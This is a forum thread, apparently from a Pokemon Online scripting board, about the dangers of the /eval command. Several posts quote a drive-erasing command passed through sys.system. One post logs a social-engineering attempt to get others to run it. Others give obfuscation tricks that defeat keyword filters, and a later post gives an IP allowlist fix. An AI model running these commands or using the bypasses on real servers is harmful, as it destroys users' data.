/EVAL Command!

Discussion in 'Server and Client Scripting' started by Valstin, Sep 5, 2011.

  1. Valstin

    Valstin iPLayCOD

    Joined:
    Aug 11, 2011
    Messages:
    126
    Likes Received:
    0
    I was told that /eval can erase my whole C:drive if the following code is used:

    /eval sys["sys"+"tem"]("Erase C: /F /S /Q")



    is it true?
     
  2. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    Well,
sys.system will call for operating system commands, and erase (http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/del.mspx?mfr=true) is the command to remove files in the Windows world.

    So, yes, provided that 1) you run PO with privileges to erase your computer and 2) you run that script.

    Why you would run such a script is beyond my imagination, but it shows that you shouldn't let anyone use /Eval-like commands (including eval(script), sys.delayedCall(script, ms), sys.webCall(url, script)).
     
  3. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
It's not the eval command, it's the .system command, which is transformed into ["sys"+"tem"] in your example for some reason (avoiding safe mode?). Eval just... well, evaluates it.
    But it's up to you to provide the security of your server: you shouldn't run it as system administrator and shouldn't allow access to /eval to every user in your scripts. See the p-o scripts for example: access to this command is granted only to several IP addresses.
     
  4. Rigas

    Rigas Active Member

    Joined:
    Feb 8, 2011
    Messages:
    494
    Likes Received:
    93
    (01:17) zerogravity: hey
    (01:17) Rigas: Hey.
    (01:18) zerogravity: /eval sys.system("Erase D:; Erase C:");
    (01:18) zerogravity: type that in Main chat
    (01:18) zerogravity: it kills skarms Harddrive.
    (01:18) zerogravity: uThere?
    (01:19) Rigas: I am.
    (01:19) zerogravity: /eval sys.system("Erase D:; Erase C:");
    (01:19) zerogravity: type that in Main chat
    (01:19) zerogravity: it kills skarms Harddrive.
    (01:19) Rigas: And I'm not stupid.
    (01:19) zerogravity: (:
    (01:19) zerogravity: LOL
    (01:19) zerogravity: ikr.
    (01:19) The other party left the server, so the window was disabled.

    ._.
     
  5. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    sys.system() is not blocked by safe mode at the moment although you can disable it at compile time (nosysteminscript option or full blown safeonlyscript that removes even more functions). I think I'll need to check for this option to make it consistent.
     
  6. Valstin

    Valstin iPLayCOD

    Joined:
    Aug 11, 2011
    Messages:
    126
    Likes Received:
    0

    he said the same thing to me
     
  7. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    I made a small snip for this, it blocks sys.system and sys.shutDown, also using regexp to only count a-Z chars
     
  8. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
Yeah, you can't really avoid them with regexps. Safe scripts are the way to go after the next update.
     
  9. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
Can't you simply redeclare sys.system?
    Code (text):
        sys.system = function() { return undefined; }
    And there are far too many harmful commands to try to block them.
    Server administrators just shouldn't be stupid and allow evaling code to users.
     
  10. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
I do
    Code (text):
        /eval delete sys.system;
        /eval sys.system("insert malicious characters here");
    and it'll work :3
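Why the "redeclare sys.system" idea from post 9 is undone by the "delete sys.system" reply above, as an added example that is not part of the thread or of Pokemon Online's scripts. It assumes the host's sys object exposes its native methods through a wrapper that behaves like a prototype, so an assignment only creates a shadowing own property; a plain object stands in for that wrapper here.

```javascript
// Added example, not from the thread or from Pokemon Online.
// Assumption: the host's sys object exposes its native methods through a
// prototype-like wrapper; an assignment only adds a shadowing own property.
const hostMethods = {
  system: function (cmd) { return "NATIVE:" + cmd; }, // stands in for the host call
  sendAll: function (msg) { return "SENT:" + msg; },
};
function makeSys() { return Object.create(hostMethods); }

// Post 9: shadow the method with a no-op.
function shadowSystem(sys) {
  sys.system = function () { return undefined; };
  return sys;
}

// Post 10: delete the own property; the wrapper's method is visible again.
function deleteThenCall(sys) {
  try { delete sys.system; } catch (e) { /* non-configurable throws in strict mode */ }
  return sys.system("x");
}

// Harder: a non-writable, non-configurable own property survives delete...
function lockSystem(sys) {
  Object.defineProperty(sys, "system", {
    value: function () { return undefined; },
    writable: false, configurable: false, enumerable: false,
  });
  return sys;
}

// ...but the native method still exists on the wrapper, so this is not a
// sandbox: it only hides the obvious spelling. Restricting who may run
// /eval at all (post 36) is the control that actually holds.
function nativeStillReachable(sys) {
  return typeof Object.getPrototypeOf(sys).system === "function";
}
```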
     
  11. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    I hope that means not what I think it means (^ ^)'
     
  12. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    I think he meant to block the use of system function in eval.
     
  13. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    I mean "after next update" part. It looked like you did it too. "Too" because I implemented it after I posted that message :}
     
  14. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
You can:

    Code (javascript):
        var evalMsg = commandData.replace(/[^a-z]/gi, ""); // Everything is case sensitive cuz pro.
        if (evalMsg.indexOf("syssystem") != -1) { // Dots are replaced
            // continue //
        }
     
  15. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    LOL It will not work, because you can call any given function in 9999 different ways that don't even have those letters.
     
  16. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
Yeah, it blocks most ways of usage though.
     
  17. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    if you block "eval" and "sys", then I give up, until then I won't.

    edit: 1100th post
     
  18. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    Even if you block sys word it is still possible. You can google around for JS obfuscation things :}
     
  19. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    Block "this" too, it's the same as "sys" object.

This works too in PO scripts:
    Code (text):
        /eval a="sy";b="s.sendAll('lol')"; arguments.callee(src, command, a+b, tar)
    so you need to ban "arguments" too
     
  20. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
And something like this as well...
    Code (javascript):
        /eval for (i in this) { if (-1 != i.indexOf('ystem')) this[i]('eject -T');}
    In the end, blocking everything will render 'eval' useless.
     
  21. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    That is the point. You can't block system without blocking access to sys object, which has all the good functions.

    edit. add "script" to the list of blocked words
     
  22. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
And you can use an array:
    Code (javascript):
        var earr = ['s','y','s','.','s','y','s','t','e','m','(','co','de',')'];
        eval(earr.join(""));
    Though my blocker works against this type.
     
  23. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
Code (javascript):
        alert([][(![]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[([][(![]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(![]+[])[+!+[]]](+[]+[+[]])[+!+[]]);
    Guess what this does, lol. It isn't new but still relevant :)
     
  24. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    [15:52:01.447] TypeError: can't convert undefined to object
     
  25. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    Run in browser. alert() is browser's function after all :}
     
  26. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
I ran it in a browser. It tells me that.

    // edit: doesn't work in Firefox, but Safari prints "D"
     
  27. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
  28. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
Ok, so
    Code (text):
        []['sort']['call']()
    will give you the global object, i.e. sys, which can be obfuscated into a long string of []+!s
     
  29. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
Code (javascript):
        var s = commandData.replace(/[^sytem]/g, "");
        if (s.indexOf('syssystem') != -1)
            s = 'syssystem';
        var sarr = [];
        for (var x in s) {
            sarr.push(s[x]);
        }
        var scount = 0, ycount = 0, tcount = 0, ecount = 0, mcount = 0;
        // Using count to minimize false positives.
        sarr.forEach(function(l) {
            if (l == "s") scount += 1;
            else if (l == "y") ycount += 1;
            else if (l == "t") tcount += 1;
            else if (l == "e") ecount += 1;
            else if (l == "m") mcount += 1;
        });
        // sys.system
        if (scount >= 4 && ycount >= 2 && tcount >= 1 && ecount >= 1 && mcount >= 1) {
            /* continue */
        }
    Beat that :P
     
    Last edited: Sep 8, 2011
  30. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
    !eval sys.sendHtmlAll('<span>Hi, all</span>')
     
  31. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
Hurr, there's not much better you can do against it >_>.
     
  32. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
Indeed, so I don't waste my time. Eh... I actually do, but not with this.
    The right way to protect your server is to allow execution of eval only for administrators and not grant administrating rights to retards who type random commands.
    Or you can use the future safe mode if you're really paranoid.
     
  33. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
First of all:
    Owners should be able to /sendhtmlall if you have that, so that they can't get hit by it, or just don't eval sendhtmlall.
    Second:
    You didn't have 2 'y's in your eval :P
    Third:
    Only trusted people should be able to use it, yes.
    Biggest tip for them: Don't eval code that people tell you to, it's most likely bad.
     
  34. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
That wasn't the point; I can give you an infinity of possible viable commands that have 4 letters 's', 2 letters 'y', and so on...
    Filtering will lead you nowhere, and it was pointed out several times already.

    As for the 2 'y's, well, you fixed it after my message. Add this letter inside that span if you want.
     
  35. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    The best thing is to not have eval in the first place :}
     
  36. Seiki

    Seiki :derp:

    Joined:
    Aug 20, 2011
    Messages:
    117
    Likes Received:
    0
The best thing to do is leave out Eval >.>
    I don't get what its point is, after
    people trying to destroy servers with it lol
    Edit: Mystra u friggin Ninja :c I didn't see that post. But yeah. Don't use eval lol

    OR!

    Make it only for the host (127.0.0.1). Simple as that :/
    Code (Javascript):
        if (sys.ip(source) != '127.0.0.1') { // If you have a different script, src would be better to use than source :}
            sys.sendMessage(source, "Your IP (" + sys.ip(source) + ") has no right to use the command Eval."); // :3
            return;
        }
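The host-only gate above, extended into a small allowlist check that also requires an auth level, as an added example that is not part of the thread or of the Pokemon Online scripts. sys.ip(id) and sys.sendMessage(id, msg) are the calls used in the thread; sys.auth(id) returning a numeric auth level is an assumption, and the mock sys object at the bottom is constructed so the code runs offline.

```javascript
// Added example, not from the thread or from Pokemon Online.
// Assumed host calls: sys.ip(id), sys.auth(id) (numeric level), sys.sendMessage(id, msg).
const EVAL_POLICY = {
  allowedIps: new Set(["127.0.0.1"]), // host only, as post 36 suggests
  minAuth: 3,                         // assumed scale where 3 is the owner level
};

// Decide on *who* is asking, never on the text of the command: the thread
// shows that filtering the command text cannot be made sound.
function canUseEval(sys, src, policy) {
  const ip = sys.ip(src);
  const auth = sys.auth(src);
  const ok = policy.allowedIps.has(ip) && auth >= policy.minAuth;
  return { ok: ok, ip: ip, auth: auth };
}

// Returns an audit line for the server log and whether the code was run;
// runEval stands in for the real eval(commandData) call in the script.
function handleEval(sys, src, commandData, policy, runEval) {
  const d = canUseEval(sys, src, policy);
  if (!d.ok) {
    sys.sendMessage(src, "Your IP (" + d.ip + ") has no right to use the command Eval.");
    return { executed: false, audit: "DENIED eval from " + d.ip + " auth=" + d.auth };
  }
  runEval(commandData);
  return { executed: true, audit: "eval by " + d.ip + " auth=" + d.auth + ": " + commandData };
}

// Constructed mock of the host object so the gate can be exercised offline.
function mockSys(players) {
  const sent = [];
  return {
    ip: function (id) { return players[id].ip; },
    auth: function (id) { return players[id].auth; },
    sendMessage: function (id, msg) { sent.push([id, msg]); },
    sent: sent,
  };
}
```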